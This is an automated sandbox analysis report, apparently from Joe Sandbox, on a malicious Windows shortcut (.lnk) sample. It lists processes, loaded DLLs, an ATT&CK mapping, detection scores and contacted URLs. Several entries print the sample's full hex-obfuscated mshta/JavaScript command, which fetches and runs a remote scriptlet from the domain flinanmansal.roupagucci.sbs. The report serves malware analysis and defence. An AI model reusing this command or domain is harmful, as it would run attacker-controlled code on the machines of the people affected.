Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()"Jump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: mshta.exe, 00000003.00000003.2109022379.0000029E8CE9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111510367.0000029E8CE9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113657541.0000029E8CE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108977142.0000029E8CEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111196582.0000029E8CE92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110887212.0000029E8CEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113778089.0000029E8CEF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()"Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c mshta "javascript:var _$_wxkh=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{getobject(_$_wxkh[1])[_$_wxkh[0]]()}catch(e){};close()"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var _$_wxkh=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{getobject(_$_wxkh[1])[_$_wxkh[0]]()}catch(e){};close()"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var _$_wxkh=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{getobject(_$_wxkh[1])[_$_wxkh[0]]()}catch(e){};close()"Jump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter		1
DLL Side-Loading		11
Process Injection		11
Process Injection		OS Credential Dumping1
Security Software Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
DLL Side-Loading		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive13
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS12
System Information Discovery		Distributed Component Object ModelInput Capture1
Ingress Tool Transfer		Traffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
ProconGO1121082800.LnK.lnk5%ReversingLabs
ProconGO1121082800.LnK.lnk100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://cm.g.double0%Avira URL Cloudsafe
https://iframe.arkoselabs.com/0%Avira URL Cloudsafe
https://iframe.arkos0%Avira URL Cloudsafe
https://ads-twitter.com0%Avira URL Cloudsafe
http://micrt.co0%Avira URL Cloudsafe
https://x.com0%URL Reputationsafe
https://recaptcha.net/recaptcha/0%Avira URL Cloudsafe
https://upload.x.com0%Avira URL Cloudsafe
https://static.ads-twitter.com0%Avira URL Cloudsafe
https://ton.x.com0%Avira URL Cloudsafe
https://iframe.arkoselabs.com/0%VirustotalBrowse
http://micrt.co0%VirustotalBrowse
https://vaultjs.apideck.com/0%Avira URL Cloudsafe
https://ads-twitter.com0%VirustotalBrowse
https://pay.x.com0%Avira URL Cloudsafe
https://static.ads-twitter.com0%VirustotalBrowse
https://ton-staging.pdxa.x.com0%Avira URL Cloudsafe
https://recaptcha.net/recaptcha/0%VirustotalBrowse
https://ton.x.com0%VirustotalBrowse
https://flinanmansal.roupagucci.sbs/0%Avira URL Cloudsafe
https://upload.x.com0%VirustotalBrowse
https://dwo3ckksxlb0v.cloudfront.net;0%Avira URL Cloudsafe
https://vaultjs.apideck.com/0%VirustotalBrowse
https://www.twitter.com(0%Avira URL Cloudsafe
HTtps://flinanmansal.roupagucci.sbs/?1/0%Avira URL Cloudsafe
https://ton-staging.pdxa.x.com0%VirustotalBrowse
https://flinanmansal.roupagucci.sbs/?1/9?s0%Avira URL Cloudsafe
https://localhost.x.com:3443;0%Avira URL Cloudsafe
https://prod-periscope-profile.s10%Avira URL Cloudsafe
https://flinanmansal.roupagucci.sbs/?1/??u0%Avira URL Cloudsafe
https://analytics.x.com0%Avira URL Cloudsafe
https://pay.x.com0%VirustotalBrowse
https://analytics.x.com0%VirustotalBrowse
https://aa.x.com0%Avira URL Cloudsafe
https://flinanmansal.roupagucci.sbs/?1/Ztu0%Avira URL Cloudsafe
https://aa.x.com0%VirustotalBrowse
https://api-stream.x.com0%Avira URL Cloudsafe
https://mobile.x.com0%Avira URL Cloudsafe
https://ton-staging.atla.x.com0%Avira URL Cloudsafe
https://ads-api.x.com0%Avira URL Cloudsafe
https://caps.x.com0%Avira URL Cloudsafe
https://api.x.com0%Avira URL Cloudsafe
https://client-api.arkoselabs.com/0%Avira URL Cloudsafe
https://caps.x.com0%VirustotalBrowse
https://ads-api.x.com0%VirustotalBrowse
https://ton-staging.atla.x.com0%VirustotalBrowse
https://client-api.arkoselabs.com/0%VirustotalBrowse
https://api-stream.x.com0%VirustotalBrowse
https://mobile.x.com0%VirustotalBrowse
https://api.x.com0%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
twitter.com
104.244.42.65
truefalse
    		high
    flinanmansal.roupagucci.sbs
    		104.21.29.223
    		truefalse
      		unknown
      www.twitter.com
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://www.twitter.com/false
          		high
          https://twitter.com/false
            		high
            https://flinanmansal.roupagucci.sbs/?1/false
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://mmdhdsnappytv-vh.akamaihd.netmshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://iframe.arkosmshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.twitter.com/8mshta.exe, 00000003.00000003.2096343502.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://cm.g.doublemshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://iframe.arkoselabs.com/mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://twitter.com/$mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://media.riffsy.commshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://twitter.com/privacymshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://cm.g.doubleclick.netmshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://ton-staging.pdxa.twitter.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://www.twitter.com/0mshta.exe, 00000003.00000003.2096343502.000002A68F343000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://analytics.twitter.commshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://www.periscope.tvmshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://dhdsnappytv-vh.akamaihd.netmshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://localhost.twitter.com:3443mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://c.tenor.commshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://micrt.comshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://support.twitter.com/articles/20170514mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://vmap.snappytv.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.twitter.com/Hmshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://ads-twitter.commshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.pscp.tvmshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://upload.x.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://vmap.grabyo.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://checkoutshopper-live.adyen.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://twitter.com/(mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ton.twitter.commshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://recaptcha.net/recaptcha/mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • 0%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://static.ads-twitter.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • 0%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://vmapstage.snappytv.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://pay.twitter.commshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://api.x.aimshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ton.x.commshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • 0%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://api.twitter.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://twitter.commshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://upload.twitter.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://api-stream.twitter.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://vaultjs.apideck.com/mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • 0%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=falsemshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://cards-frame.twitter.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://pay.x.commshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • 0%, Virustotal, Browse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://sentry.iomshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://mobile.twitter.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://ton-staging.pdxa.x.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • 0%, Virustotal, Browse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://vmaprel.snappytv.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
